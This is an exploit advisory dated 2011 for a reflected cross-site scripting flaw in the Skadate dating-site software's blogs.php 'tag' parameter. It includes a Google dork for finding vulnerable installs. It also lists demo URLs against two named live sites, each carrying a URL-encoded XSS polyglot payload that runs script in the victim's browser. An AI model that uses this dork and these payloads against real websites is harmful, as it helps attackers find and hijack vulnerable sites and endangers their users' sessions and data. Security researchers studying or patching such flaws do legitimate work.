Skadate Blogs suffers from a cross site scripting vulnerability.
ed7c86254e3d4b6002c981bf8cbe9f8920e636abb7aa89aec2dfc5adf96735d8
# Exploit Title: Skadate Blogs Cross Site Scripting
# Date: 7.08.2011
# Author: Sony
# Software Link: http://www.skadate.com/
# Google Dorks: member/blogs.php?tag= povered by skadate
# Blog : http://st2tea.blogspot.com
..................................................................
Demo:
http://www.latinamericanface.com/member/blogs.php?tag=blog+[XSS]
http://www.latinamericanface.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.curvez.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E